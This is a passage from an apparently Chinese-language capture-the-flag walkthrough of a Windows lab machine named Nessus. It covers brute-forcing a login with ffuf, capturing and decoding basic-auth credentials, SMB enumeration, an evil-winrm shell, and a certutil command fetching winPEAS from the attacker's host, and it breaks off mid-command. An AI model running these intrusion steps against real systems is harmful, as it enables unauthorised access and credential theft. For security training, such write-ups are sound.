   : 2024:10:18 15:10:05+02:00\nCreator Tool                    : Apache FOP Version 2.8\nMetadata Date                   : 2024:10:18 15:10:05+02:00\nPage Mode                       : UseOutlines\nCreator                         : Apache FOP Version 2.8\n======== Web Application Tests_f6jg9t.pdf\nExifTool Version Number         : 13.10\nFile Name                       : Web Application Tests_f6jg9t.pdf\nDirectory                       : .\nFile Size                       : 136 kB\nFile Modification Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Access Date\/Time           : 2025:06:09 03:48:23-04:00\nFile Inode Change Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PDF\nFile Type Extension             : pdf\nMIME Type                       : application\/pdf\nLinearized                      : No\nPage Count                      : 6\nProfile CMM Type                : Little CMS\nProfile Version                 : 2.3.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2004:08:13 12:18:06\nProfile File Signature          : acsp\nPrimary Platform                : Microsoft Corporation\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : Little CMS\nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 7fb30d688bf82d32a0e748daf3dba95d\nDevice Mfg Desc                 : lcms generated\nProfile Description             : sRGB\nDevice Model Desc               : sRGB\nMedia White Point               : 0.95015 1 1.08826\nRed Matrix Column               : 0.43585 0.22238 0.01392\nBlue Matrix Column              
: 0.14302 0.06059 0.71384\nGreen Matrix Column             : 0.38533 0.71704 0.09714\nRed Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity Channel 3          : 0.14999 0.06\nProfile Copyright               : no copyright, use freely\nXMP Toolkit                     : Image::ExifTool 12.76\nDate                            : 2024:10:18 15:10:19+02:00\nFormat                          : application\/pdf\nLanguage                        : x-unknown\nAuthor                          : Jose\nPDF Version                     : 1.4\nProducer                        : Apache FOP Version 2.8\nCreate Date                     : 2024:10:18 15:10:19+02:00\nCreator Tool                    : Apache FOP Version 2.8\nMetadata Date                   : 2024:10:18 15:10:19+02:00\nPage Mode                       : UseOutlines\nCreator                         : Apache FOP Version 2.8\n    3 image files read<\/code><\/pre>\n<h3>\u7206\u7834\u767b\u5f55\u4fe1\u606f<\/h3>\n<p>\u53d1\u73b0\u4e86\u4f5c\u8005\u4fe1\u606f\u4e3a<code>Jose<\/code>\uff0c\u5c1d\u8bd5\u6293\u5305\u7206\u7834\u90a3\u4e2a\u767b\u5f55\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011599.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011599.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609160352560\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u77e5\u9053\u4e86\u53c2\u6570\u5c31\u53ef\u4ee5\u8fdb\u884c\u6d4b\u8bd5\u4e86<\/p>\n<pre><code class=\"language-bash\">{&quot;username&quot;:&quot;username&quot;,&quot;password&quot;:&quot;password&quot;}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011600.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609161521148\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u54cd\u5e94\u5305\u5219\u4e3a\uff1a<\/p>\n<pre><code class=\"language-bash\">{&quot;error&quot;:&quot;Invalid Credentials&quot;}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011601.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609165437812\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230\u5bc6\u7801\uff1a<code>tequiero<\/code>\u3002\u4e5f\u53ef\u4ee5\u4f7f\u7528\u522b\u7684\u529e\u6cd5\u6bd4\u5982\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ ffuf -u &#039;https:\/\/192.168.10.100:8834\/session&#039; -w \/usr\/share\/wordlists\/rockyou.txt -d &#039;{&quot;username&quot;:&quot;jose&quot;,&quot;password&quot;:&quot;FUZZ&quot;}&#039; -H &#039;Content-Type: application\/json&#039; -fc 401\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : POST\n :: URL              : https:\/\/192.168.10.100:8834\/session\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/rockyou.txt\n :: Header           : Content-Type: application\/json\n :: Data             : {&quot;username&quot;:&quot;jose&quot;,&quot;password&quot;:&quot;FUZZ&quot;}\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response status: 401\n________________________________________________\n\ntequiero                [Status: 200, Size: 179, Words: 1, Lines: 1, Duration: 
1796ms]<\/code><\/pre>\n<p>\u6211\u5c1d\u8bd5\u4e86hydra\u4f46\u662f\u603b\u662f\u62a5\u9519\u3002\u3002\u3002<\/p>\n<h3>\u767b\u5f55\u83b7\u53d6\u8ba4\u8bc1\u4fe1\u606f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011602.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011602.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172140160\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011603.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011603.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172224517\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4fee\u6539\u524d\u7aef\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u663e\u793a\u5bc6\u7801\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011604.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011604.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609173049200\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4fee\u6539\u76f8\u5173\u53c2\u6570\uff0c\u4f7f\u5176\u94fe\u63a5\u5230kali\u4e0a\u53bb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011605.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011605.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172424660\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011606.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011606.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172439004\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u672a\u53d1\u9001\u8ba4\u8bc1\u4fe1\u606f\uff0c\u5207\u6362\u4e00\u4e0b<code>Auth Method<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011607.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011607.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609172926474\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011608.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011608.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609173102531\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u663e\u793a\u4e86\u4e00\u4e2a basic \u8ba4\u8bc1\u4fe1\u606f\uff0c\u8fdb\u884c base64 \u89e3\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ echo &quot;bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==&quot; | base64 -d\nnesus:Z#JuXH$ph-;v@,X&amp;mV) <\/code><\/pre>\n<p>\u62ff\u5230\u767b\u5f55\u51ed\u8bc1\uff0c\u5c1d\u8bd5ssh\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ ssh nesus@$IP    \nssh: connect to host 192.168.10.100 port 22: Connection refused<\/code><\/pre>\n<p>\u7a81\u7136\u60f3\u8d77\u6765\u672a\u5f00\u653e\u76f8\u5173\u7aef\u53e3\u3002\u3002\u3002\u3002<\/p>\n<h3>smb\u670d\u52a1\u63a2\u6d4b<\/h3>\n<p>\u518d\u6b21\u8fdb\u884c\u670d\u52a1\u63a2\u6d4b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ crackmapexec smb $IP --groups --loggedon-users -u nesus -p &#039;Z#JuXH$ph-;v@,X&amp;mV)&#039;\nSMB         192.168.10.100  445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)\nSMB         192.168.10.100  445    NESSUS           [-] Nessus\\nesus:Z#JuXH$ph-;v@,X&amp;mV) STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>windows\u9776\u673a\u7684\u5e38\u89c1bug\uff0c\u5bc6\u7801\u8fc7\u671f\u4e86\uff0c\u5c1d\u8bd5\u5728\u9776\u673a\u4e0a\u91cd\u7f6e\u5bc6\u7801\uff1a<\/p>\n<p><code>ctrl+alt+del<\/code>(virtualbox \u91cc\u9762\u662f\u53f3\u952ectrl+del)\u89e3\u9501\uff0c\u7136\u540e\u6309esc\u8fd4\u56de\u4e0a\u4e00\u7ea7\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011610.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011610.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609174157784\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u70b9\u51fb<code>nesus<\/code>\uff0c\u7136\u540e\u8f93\u5165\u5bc6\u7801\u4ee5\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011611.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011611.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609174312361\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p><code>enter<\/code>\u4e00\u4e0b\uff0c\u6362\u5b8c\u5bc6\u7801\u4ee5\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011612.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011612.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609174420481\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u91cc\u518d<code>enter<\/code>\u4e00\u4e0b\uff0c\u6211\u4fee\u6539\u7684\u662f<code>password<\/code>\uff0c\u5982\u679c\u8fd9\u4e2a\u6b65\u9aa4\u8fd8\u770b\u4e0d\u61c2\uff0c\u53ef\u4ee5\u53c2\u8003\u4e4b\u524d\u7684\u4e00\u4e2awp\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/hgbe02.github.io\/Hackmyvm\/DC01.html#hash%E7%A2%B0%E6%92%9E\">https:\/\/hgbe02.github.io\/Hackmyvm\/DC01.html#hash%E7%A2%B0%E6%92%9E<\/a><\/p>\n<\/blockquote>\n<p>\u7ee7\u7eed\uff0c\u6210\u529f\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ crackmapexec smb $IP --groups --loggedon-users -u nesus -p password             \nSMB         192.168.10.100  445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)\nSMB         192.168.10.100  445    NESSUS           [+] Nessus\\nesus:password \nSMB         192.168.10.100  445    NESSUS           [+] Enumerated loggedon users\nSMB         192.168.10.100  445    NESSUS           [-] Error enumerating domain group using dc ip 192.168.10.100: socket connection error while opening: [Errno 111] Connection refused<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbmap -u nesus -p password -H 192.168.10.100              \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. 
|_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          \n\n[+] IP: 192.168.10.100:445      Name: 192.168.10.100            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C$                                                      NO ACCESS       Default share\n        Documents                                               READ, WRITE\n        IPC$                                                    READ ONLY       Remote IPC\n[*] Closed 1 connections                          <\/code><\/pre>\n<p>\u4e00\u5207\u6b63\u5e38\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>evil-winrm<\/code>\u8fdb\u884c\u8fde\u63a5\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011613.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011613.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609175412420\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u786e\u5b9e\u4e0d\u719f\u7ec3\uff0c\u5e38\u89c1\u6307\u4ee4\u4e22\u4e0a\u53bb\u6211\u4e5f\u770b\u4e0d\u592a\u660e\u767d\uff0c\u76f4\u63a5\u4e0a<code>winPEAS<\/code>\uff01<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\Documents&gt; cd ..\/Desktop\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; dir\n\n    Directory: C:\\Users\\nesus\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024   1:41 PM             33 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; type user.txt\n72113f41d43e88eb5d67f732668bc3d1\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\nProgram &#039;certutil.exe&#039; failed to run: Access is deniedAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.\nAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException\n    + FullyQualifiedErrorId : NativeCommandFailed\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; upload 
